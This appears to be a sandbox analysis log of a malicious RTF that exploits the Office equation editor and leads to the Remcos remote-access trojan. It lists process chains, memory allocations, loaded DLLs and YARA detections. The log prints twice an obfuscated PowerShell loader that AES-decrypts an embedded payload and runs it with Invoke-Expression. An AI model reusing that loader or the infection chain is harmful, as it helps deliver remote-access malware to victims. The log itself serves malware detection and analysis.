                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process Stats: CPU usage > 49%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 8_2_004167B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_002A9669 6_2_002A9669
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043E0CC 8_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041F0FA 8_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00454159 8_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00438168 8_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004461F0 8_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043E2FB 8_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0045332B 8_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0042739D 8_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004374E6 8_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043E558 8_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00438770 8_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004378FE 8_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00433946 8_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044D9C9 8_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00427A46 8_2_00427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041DB62 8_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00427BAF 8_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00437D33 8_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00435E5E 8_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00426E0E 8_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043DE9D 8_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00413FCA 8_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00436FEA 8_2_00436FEA
Source: ~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 34 times
Source: 4vzwJTZbwT.rtf, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPED | Matched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winRTF@8/18@2/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_00417952
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_0040F474
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_0041B4A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AA4A
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$zwJTZbwT.rtfJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-9R4HLX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR752F.tmpJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................................................................T..........s......!.....Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.......................................................................!.......................!.....Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: 4vzwJTZbwT.rtf | ReversingLabs: Detection: 50%
                Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS"
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: propsys.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ntmarta.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: credssp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: shcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: bcrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
